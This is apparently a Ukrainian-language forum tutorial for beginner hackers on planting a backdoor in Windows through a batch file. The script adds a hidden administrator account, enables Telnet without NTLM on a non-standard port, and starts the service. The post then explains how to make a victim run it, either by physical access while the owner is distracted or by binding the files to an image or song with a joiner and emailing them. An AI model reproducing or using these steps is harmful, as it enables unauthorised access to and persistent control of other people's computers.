Привіт всім початківцям хакерам) Ось як же мене дратує коли просять підказати програму для злому чого або без навичок програмування! Ну що це за дитячість? Все одно, що писати програми на c ++ не знаючи самого мови! Ось сьогодні ми поговоримо про злом через батники і командний рядок) Приступаємо))
net user SUPPORT_388945a0 / delete
net user hacker hack / add
net localgroup Адміністратори hacker / add
net localgroup Користувачі SUPPORT_388945a0 / del
regedit / s conf.reg
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet
все це пишеш в блокноті, і зберігаємо як * .bat
chcp 1251- змінює кодування на 1251, так як батник написаний не в дос кодуванні.
Так як при створенні нового адміна він буде видно в welcome screen'е, відключити його можна імпортувавши рег файл до реєстру, такого змісту:
Windows Registry Editor Version 5.00
Сервіс телнет за замовчуванням відключений, але є така команда sc config tlntsvr start = auto яка змінює тип його запуску на автоматичний (по дефолту disabled). При запуску ТЕЛНЕТ, він ставиться на стандартний свій 23-ий порт, але на жаль це палевно, тому раджу прописувати цією командою tlntadmn config port = 972 sec = -NTLM, рідко використовуваний порт. У нашому випадку це 972. Ну ось все настройки і конфігурація сервісу завершена, і цей рядок net start Telnet остаточно запустить наш бекдор. Тепер залишилася єдина проблема - як же ці 2 файли підсунути користувачеві, тим більше щоб він відкрив їх сам. Є 2 способи -
1) Якщо ви маєте доступ до комп'ютера який хочете ломануть, приходьте туди з флешкою на якій ці 2 файли, відправляєте господаря зробити чайку, а самі їх відкриваєте)
2) підсовують на мило попередньо об'єднавши їх з який-небудь картинкою або музикою і коли користувач відкриває картинку (пісню) спрацьовує Джойнер. Принцип Джойнер такий - до картинки і \ або пісні підсувається один або кілька файлів і при відкритті одного, відкриваються і інші)) Сподіваюся суть ви зрозуміли))) Самі ж Джойнер можете знайти у всесвітній павутині)) Хоча добре тримайте прямий лінк програми PE_Stapl) пароль до архіву 123 до речі))))